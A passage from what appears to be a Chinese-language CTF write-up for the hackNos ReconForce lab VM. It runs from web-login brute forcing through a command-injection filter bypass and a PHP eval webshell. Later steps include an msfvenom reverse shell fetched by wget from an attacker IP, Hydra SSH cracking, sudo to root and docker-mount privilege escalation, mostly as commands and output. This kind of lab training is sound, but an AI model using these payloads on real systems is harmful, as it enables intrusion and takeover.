192.168.5.132:80 - Success: 'admin:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'connect:connect'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sitecom:sitecom'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:cisco'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:sanfran'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'private:private'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:xampp'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:wampp'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:ppmax2011 '</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:vagrant'</span><br><span class="line">[*] Scanned 1 of 1 hosts (100% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>爆破得到结果<code>[+] 192.168.5.132:80 - Success: 'admin:Security@hackNos'</code></p><p>登录进去后发现可以命令执行</p><p><img src="/2023/10/21/ReconForce/image-20230628231041967.png" alt="image-20230628231041967"></p><p><img src="/2023/10/21/ReconForce/image-20230628231103439.png" alt="image-20230628231103439"></p><p>使用burp suite 发送命令查看out.php</p><p><img src="/2023/10/21/ReconForce/image-20230628231119740.png" alt="image-20230628231119740"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"></span><br><span class="line">if( isset( $_POST[ 'Submit' ] ) ) {</span><br><span class="line"> // Get input</span><br><span class="line"> $target = trim($_REQUEST[ 'ip' ]);</span><br><span class="line"></span><br><span class="line"> // Set blacklist</span><br><span class="line"> $substitutions = array(</span><br><span class="line"> '&' => '',</span><br><span class="line"> ';' => '',</span><br><span class="line"> '| ' => '',</span><br><span class="line"> '-' => '',</span><br><span class="line"> '$' => '',</span><br><span class="line"> '(' => '',</span><br><span class="line"> ')' => '',</span><br><span class="line"> '`' => '',</span><br><span class="line"> '||' => '',</span><br><span class="line"> );</span><br><span class="line"></span><br><span class="line"> // Remove any of the charactars in the array (blacklist).</span><br><span class="line"> $target = str_replace( array_keys( $substitutions ), $substitutions, $target );</span><br><span class="line"></span><br><span class="line"> // Determine OS and execute the ping command.</span><br><span class="line"> if( stristr( php_uname( 's' ), 'Windows NT' ) ) {</span><br><span class="line"> // Windows</span><br><span class="line"> $cmd = shell_exec( 'ping ' . $target );</span><br><span class="line"> }</span><br><span class="line"> else {</span><br><span class="line"> // *nix</span><br><span class="line"> $cmd = shell_exec( 'ping -c 4 ' . $target );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> // Feedback for the end user</span><br><span class="line"> echo "<pre>{$cmd}</pre>";</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">?> </span><br></pre></td></tr></table></figure><p>由于用于过滤的数组编写有一定的问题</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$substitutions = array(</span><br><span class="line"> '&' => '',</span><br><span class="line"> ';' => '',</span><br><span class="line"> '| ' => '',//这里是|加上一个空格</span><br><span class="line"> '-' => '',</span><br><span class="line"> '$' => '',</span><br><span class="line"> '(' => '',</span><br><span class="line"> ')' => '',</span><br><span class="line"> '`' => '',</span><br><span class="line"> '||' => '',</span><br><span class="line">);</span><br></pre></td></tr></table></figure><p>即<code>127.0.0.1| id</code>被拦截而<code>127.0.0.1|id</code>不被拦截</p><p>那么直接用<code>|</code>不加空格就可以绕过过滤</p><p>直接写入一句话<code>127.0.0.1|echo "<?php @eval($_POST['qwer']);?>" >> php.php</code></p><p><img src="/2023/10/21/ReconForce/image-20230628231150995.png" alt="image-20230628231150995"></p><p>发现菜刀蚁剑等webshell无法连接</p><h3 id="使用msf生成后门反弹shell"><a href="#使用msf生成后门反弹shell" class="headerlink" title="使用msf生成后门反弹shell"></a>使用msf生成后门反弹shell</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=1234 R > pwn1234.php</span><br></pre></td></tr></table></figure><p>使用wget将木马传输到目标主机</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=127.0.0.1|wget http://192.168.56.102/shell.php&Submit=Ping_Scan</span><br></pre></td></tr></table></figure><p>使用msf监听,并在浏览器中访问pwn1234.php,得到一个meterpreter shell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">msf6 > use exploit/multi/handler </span><br><span class="line">[*] Using configured payload generic/shell_reverse_tcp</span><br><span class="line">msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp</span><br><span class="line">payload => php/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(multi/handler) > set lhost 0.0.0.0</span><br><span class="line">lhost => 0.0.0.0</span><br><span class="line">msf6 exploit(multi/handler) > set lport 1234</span><br><span class="line">lport => 1234</span><br><span class="line">msf6 exploit(multi/handler) > exploit </span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 0.0.0.0:1234 </span><br><span class="line">[*] Sending stage (39282 bytes) to 192.168.5.132</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.5.129:1234 -> 192.168.5.132:51424) at 2021-09-17 15:11:04 +0800</span><br><span class="line">meterpreter > </span><br></pre></td></tr></table></figure><p>切换shell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > shell</span><br><span class="line">Process 3357 created.</span><br><span class="line">Channel 0 created.</span><br><span class="line">python3 -c 'import pty;pty.spawn("/bin/bash")'</span><br><span class="line">www-data@hacknos:/var/www/recon/5ecure$</span><br></pre></td></tr></table></figure><p>获取user.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www$ cat /home/recon/user.txt</span><br><span class="line">cat /home/recon/user.txt</span><br><span class="line">###########################################</span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>获取/etc/passwd</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www/recon/5ecure$ cat /etc/passwd</span><br><span class="line">cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">messagebus:x:103:106::/nonexistent:/usr/sbin/nologin</span><br><span class="line">syslog:x:104:110::/home/syslog:/usr/sbin/nologin</span><br><span class="line">_apt:x:105:65534::/nonexistent:/usr/sbin/nologin</span><br><span class="line">uuidd:x:106:111::/run/uuidd:/usr/sbin/nologin</span><br><span class="line">tcpdump:x:107:112::/nonexistent:/usr/sbin/nologin</span><br><span class="line">landscape:x:108:114::/var/lib/landscape:/usr/sbin/nologin</span><br><span class="line">pollinate:x:109:1::/var/cache/pollinate:/bin/false</span><br><span class="line">sshd:x:110:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</span><br><span class="line">recon:x:1000:119:rahul:/home/recon:/bin/bash</span><br><span class="line">lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false</span><br><span class="line">ftp:x:111:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin</span><br><span class="line">mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>发现recon用户</p><h3 id="使用hydra爆破ssh口令(这里只是想用一下hydra,密码字典还是passrecon)"><a href="#使用hydra爆破ssh口令(这里只是想用一下hydra,密码字典还是passrecon)" class="headerlink" title="使用hydra爆破ssh口令(这里只是想用一下hydra,密码字典还是passrecon)"></a>使用hydra爆破ssh口令(这里只是想用一下hydra,密码字典还是passrecon)</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">└─# cat passrecon </span><br><span class="line">Security@h</span><br><span class="line">admin</span><br><span class="line">asdf</span><br><span class="line">qwer</span><br><span class="line">aaaa</span><br><span class="line">Security@hackNos</span><br><span class="line"></span><br><span class="line">└─# hydra -l recon -P passrecon ssh://192.168.5.132 </span><br><span class="line">Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-17 22:07:52</span><br><span class="line">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</span><br><span class="line">[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task</span><br><span class="line">[DATA] attacking ssh://192.168.5.132:22/</span><br><span class="line">[22][ssh] host: 192.168.5.132 login: recon password: Security@hackNos</span><br><span class="line">1 of 1 target successfully completed, 1 valid password found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-17 22:07:55</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>获得口令<code>Security@hackNos</code></p><p>ssh 登录<code>recon</code>,并且查看sudo权限,发现拥有密码可以执行任何程序</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">└─# ssh recon@192.168.5.132 </span><br><span class="line">The authenticity of host '192.168.5.132 (192.168.5.132)' can't be established.</span><br><span class="line">ECDSA key fingerprint is SHA256:YyrsJ6SfcrEjupojYvAzzhetfPVnVVv4XDFAoaf2FGw.</span><br><span class="line">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</span><br><span class="line">Warning: Permanently added '192.168.5.132' (ECDSA) to the list of known hosts.</span><br><span class="line">recon@192.168.5.132's password: </span><br><span class="line">Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-24-generic x86_64)</span><br><span class="line"></span><br><span class="line"> * Documentation: https://help.ubuntu.com</span><br><span class="line"> * Management: https://landscape.canonical.com</span><br><span class="line"> * Support: https://ubuntu.com/advantage</span><br><span class="line"></span><br><span class="line"> System information as of Fri 17 Sep 2021 02:09:16 PM UTC</span><br><span class="line"></span><br><span class="line"> System load: 0.05 Processes: 154</span><br><span class="line"> Usage of /: 35.3% of 9.22GB Users logged in: 0</span><br><span class="line"> Memory usage: 11% IP address for ens33: 192.168.5.132</span><br><span class="line"> Swap usage: 0%</span><br><span class="line"></span><br><span class="line"> * Super-optimized for small spaces - read how we shrank the memory</span><br><span class="line"> footprint of MicroK8s to make it the smallest full K8s around.</span><br><span class="line"></span><br><span class="line"> https://ubuntu.com/blog/microk8s-memory-optimisation</span><br><span class="line"></span><br><span class="line">31 updates can be installed immediately.</span><br><span class="line">0 of these updates are security updates.</span><br><span class="line">To see these additional updates run: apt list --upgradable</span><br><span class="line"></span><br><span class="line">Your Ubuntu release is not supported anymore.</span><br><span class="line">For upgrade information, please visit:</span><br><span class="line">http://www.ubuntu.com/releaseendoflife</span><br><span class="line"></span><br><span class="line">New release '20.04.3 LTS' available.</span><br><span class="line">Run 'do-release-upgrade' to upgrade to it.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Last login: Fri Jan 10 23:05:02 2020 from 192.168.0.104</span><br><span class="line">recon@hacknos:~$ sudo -l</span><br><span class="line">[sudo] password for recon: </span><br><span class="line">Matching Defaults entries for recon on hacknos:</span><br><span class="line"> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User recon may run the following commands on hacknos:</span><br><span class="line"> (ALL : ALL) ALL</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="直接切换用户到root"><a href="#直接切换用户到root" class="headerlink" title="直接切换用户到root"></a>直接切换用户到root</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">recon@hacknos:~$ sudo su -</span><br><span class="line">root@hacknos:~# Security@hackNos</span><br><span class="line">Security@hackNos: command not found</span><br><span class="line">root@hacknos:~# ls</span><br><span class="line">root.txt snap</span><br><span class="line">root@hacknos:~# id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br><span class="line">root@hacknos:~# cat root.txt</span><br><span class="line"> $$\ $$$$$$$\ </span><br><span class="line"> \$$\ $$ __$$\ </span><br><span class="line">$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ </span><br><span class="line">\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ </span><br><span class="line">$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |</span><br><span class="line">\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |</span><br><span class="line"> $$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ |</span><br><span class="line"> \__/ \__| \__| \_______| \_______| \______/ \__| \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author: Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">WebBlog: www.hackNos.com</span><br><span class="line"></span><br><span class="line">Twitter: @rahul_gehlaut</span><br></pre></td></tr></table></figure><h3 id="在用户recon身份提权方法二"><a href="#在用户recon身份提权方法二" class="headerlink" title="在用户recon身份提权方法二"></a>在用户recon身份提权方法二</h3><p>使用工具查找可利用文件</p><p><a href="https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[-] Any interesting mail in /var/mail:</span><br><span class="line">total 8</span><br><span class="line">drwxrwsr-x 2 root mail 4096 Oct 17 2019 .</span><br><span class="line">drwxr-xr-x 14 root root 4096 Jan 6 2020 ..</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[+] Looks like we're hosting Docker:</span><br><span class="line">Docker version 19.03.2, build 6a30dfca03</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">### SCAN COMPLETE ####################################</span><br></pre></td></tr></table></figure><p>发现可以利用docker提权</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">docker images</span><br><span class="line">docker run -v /:/mnt --rm -it alpine chroot /mnt sh</span><br><span class="line">docker run -it -v /:/mbt IMAGE ID</span><br><span class="line">cd /mbt</span><br><span class="line">cat /root/root.txt</span><br></pre></td></tr></table></figure><p>具体操作</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">recon@hacknos:~$ docker images</span><br><span class="line"></span><br><span class="line">REPOSITORY TAG IMAGE ID CREATED SIZE</span><br><span class="line">recon@hacknos:~$ </span><br><span class="line">recon@hacknos:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh</span><br><span class="line">Unable to find image 'alpine:latest' locally</span><br><span class="line">latest: Pulling from library/alpine</span><br><span class="line">a0d0a0d46f8b: Pull complete </span><br><span class="line">Digest: sha256:e1c082e3d3c45cccac829840a25941e679c25d438cc8412c2fa221cf1a824e6a</span><br><span class="line">Status: Downloaded newer image for alpine:latest</span><br><span class="line"># id</span><br><span class="line">uid=0(root) gid=0(root) 